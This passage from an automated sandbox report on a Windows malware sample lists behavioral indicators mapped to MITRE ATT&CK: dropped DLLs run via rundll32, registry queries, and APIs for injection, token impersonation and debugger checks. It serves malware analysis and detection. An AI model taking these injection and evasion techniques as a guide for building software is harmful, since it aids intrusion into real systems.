\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp, 00000000-00004528.00000000.138687.1000B000.00000002.mdmp\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryExA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\908501218x27.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\version.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe.Local\\\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\x27x.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to touch file \"C:\\cmd.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe.Local\\\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" trying to access non-existent file \"C:\\C14B685409BA77161297904148FF44448F4D4CF2FA8AE116146B098141C4DAD4.EXE.LOCAL\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\x27x.dll.manifest\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\x27x.dll.123.Manifest\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\x27x.dll.124.Manifest\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\x27x.dll.2.Manifest\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system32\\rundll32.exe.Local\\\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\X27X.DLL.MANIFEST\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\X27X.DLL.123.MANIFEST\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\X27X.DLL.124.MANIFEST\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\X27X.DLL.2.MANIFEST\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\System32\\RUNDLL32.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\908501218x27.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\x27x.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" writes file \"%temp%\\908501218x27.dll\"\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" writes file \"%temp%\\x27x.dll\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\system32\\rundll32.exe\")", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"908501218x27.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\908501218x27.dll]- [targetUID: 00000000-00004528]\n \"x27x.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\x27x.dll]- [targetUID: 00000000-00004528]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"C14B685409BA77161297904148FF44448F4D4CF2FA8AE116146B098141C4DAD4\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"cmd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rundll32.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"rundll32.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp, 00000000-00004528.00000000.138687.1000B000.00000002.mdmp\")\n Found reference to API \"LoadLibraryExW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"LoadLibraryExA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-306", "type": 2, "relevance": 1, "name": "Contains ability to impersonate access tokens (API string)", "description": "Found reference to API \"NtOpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "memorydump-8", "type": 20, "relevance": 1, "name": "Found PE header in memory", "description": "Found PE header \"MZ\" - Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found PE header \"MZ\" - Source: \"00000000-00004528.00000000.138687.1000B000.00000002.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"FindResourceA\" with parameter \"109\" - (UID: 00000000-00004528)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4247624'}\" (UID: 00000000-00004528)\n \"rundll32.exe\" called \"LoadResource with parameter {'hModule': '11337728', 'hResInfo': '11363000'}\" (UID: 00000000-00004920)\n \"rundll32.exe\" called \"LoadResource with parameter {'hModule': '11337728', 'hResInfo': '11362968'}\" (UID: 00000000-00004920)\n \"rundll32.exe\" called \"LoadResource with parameter {'hModule': '11337728', 'hResInfo': '11362984'}\" (UID: 00000000-00004920)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"OutputDebugStringA\" (Indicator: \"OutputDebugString\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-450", "type": 2, "relevance": 1, "name": "Contains ability to determine if process is running under WOW64 (API string)", "description": "Found reference to API \"IsWow64Process\" (Indicator: \"IsWow64Process\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"OpenMutexA\" with parameter \"cxyjqwerty\" - (UID: 00000000-00004528)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"rundll32.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004920)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-413", "type": 2, "relevance": 1, "name": "Contains ability to find open windows (API string)", "description": "Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": 